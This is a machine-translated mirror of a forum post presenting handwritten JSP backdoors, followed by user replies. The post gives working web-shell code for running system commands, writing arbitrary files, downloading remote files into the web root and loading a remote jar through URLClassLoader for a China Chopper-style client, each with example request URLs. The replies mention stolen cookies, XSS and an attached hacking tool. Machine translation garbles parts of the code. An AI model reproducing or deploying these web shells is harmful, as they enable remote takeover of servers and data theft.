Este artigo é um artigo espelhado de tradução automática, por favor clique aqui para ir para o artigo original.

Vista: 14991|Resposta: 7

[Ferramentas de Segurança] Backdoor JSP manuscrito

[Copiar link]
Publicado em 02/01/2015 18:46:57 | | | |
Transferido de: http://p2j.cn/?p=1627
1. Executar comandos do sistema:
Executar comandos do sistema sem eco:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Pedido: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Não haverá eco após a execução, o que é muito conveniente para os bounce shells.
Há ecos com a verificação de senha:
<% if("023".equals(request.getParameter("pwd")){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter"i")).getInputStream();        int a = -1;        byte[] b = novo byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
Pedido: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Codifice a string e escreva no arquivo especificado:
1:
<%new java.io.FileOutputStream(request.getParameter("f").write(request.getParameter("c").getBytes());%>
Pedido: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Escreva no diretório web:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes();%>
Pedido: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Pedido: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Escreva no diretório web:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Pedido: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Baixar o arquivo remoto (se você não usar utilitários do Apache IO, não pode converter o fluxo de entrada em byte, então é muito longo...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = novo byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    enquanto ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Pedido: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Baixe para o caminho web:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = novo byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    enquanto ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } novo java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Pedido: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Quatro: Reflexão chama o pote externo, aperfeiçoe a porta dos fundos
Se você não gosta da função backdoor acima que está fraca e ultrapassada, pode tentar esta:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))}).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Pedido: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Conexão com faca de cozinha: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, senha 023.

Solução:
Use a reflexão para carregar um jar externo na aplicação atual, e a reflexão executa o resultado do processamento de saída. request.getParameterMap() contém todos os parâmetros solicitados. Como o pacote jar externo está carregado, o servidor deve conseguir acessar esse endereço jar.




Anterior:A crise por trás do arquivo de texto TXT
Próximo:Criptografia Java MD5, criptografia Base64 e descriptografia Java executa código-fonte de comando do sistema
Publicado em 02/01/2015 20:17:30 |
Recentemente pesquisando sobre o backdoor do JSP?
 Senhorio| Publicado em 02/01/2015 20:39:44 |
admin Postado em 2015-1-2 20:17
Recentemente pesquisando sobre o backdoor do JSP?

Você já viu JSP em uma frase? Eu encontrei, não estudei a fundo, não entendi xss, finalmente recebi os cookies ontem e não sei como modificar o upload do cookie
Publicado em 02/01/2015 20:44:40 |
Delver_Si Postado em 2015-1-2 às 20:39
Você já viu JSP em uma frase? Eu encontrei, não fui mais fundo, não entendi xss, finalmente peguei os biscoitos ontem, não sei como modificar a cozinha...

Não serão meus cookies roubados com um arquivo de assinatura personalizado,,,

Use o plugin HackBar do Firefox
Publicado em 02/01/2015 20:48:57 |
Delver_Si Postado em 2015-1-2 às 20:39
Você já viu JSP em uma frase? Eu encontrei, não fui mais fundo, não entendi xss, finalmente peguei os biscoitos ontem, não sei como modificar a cozinha...

Ghost Brother Multifuncional Navegador v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Número de downloads: 7, Preço de venda: 1 Grain MB)
 Senhorio| Publicado em 02/01/2015 20:57:50 |
admin postado em 2015-1-2 20:44
Não serão meus cookies roubados com um arquivo de assinatura personalizado,,,

Use o plugin HackBar do Firefox

Ontem, a porta livre estava convulsiva, eu não conseguia me conectar e não conseguia entrar na loja do Firefox.
 Senhorio| Publicado em 02/01/2015 20:59:01 |
admin postado em 2015-1-2 20:44
Não serão meus cookies roubados com um arquivo de assinatura personalizado,,,

Use o plugin HackBar do Firefox

O Dz não tem essa brecha
Publicado em 02/01/2015 21:00:22 |

Não sei, você pode testar, não bagunce meu banco de dados   

Todos nós usamos o Tor Browser para contornar a barreira

Disclaimer:
Todo software, material de programação ou artigos publicados pela Code Farmer Network são apenas para fins de aprendizado e pesquisa; O conteúdo acima não deve ser usado para fins comerciais ou ilegais, caso contrário, os usuários terão todas as consequências. As informações deste site vêm da Internet, e disputas de direitos autorais não têm nada a ver com este site. Você deve deletar completamente o conteúdo acima do seu computador em até 24 horas após o download. Se você gosta do programa, por favor, apoie um software genuíno, compre o registro e obtenha serviços genuínos melhores. Se houver qualquer infração, por favor, entre em contato conosco por e-mail.

Mail To:help@itsvse.com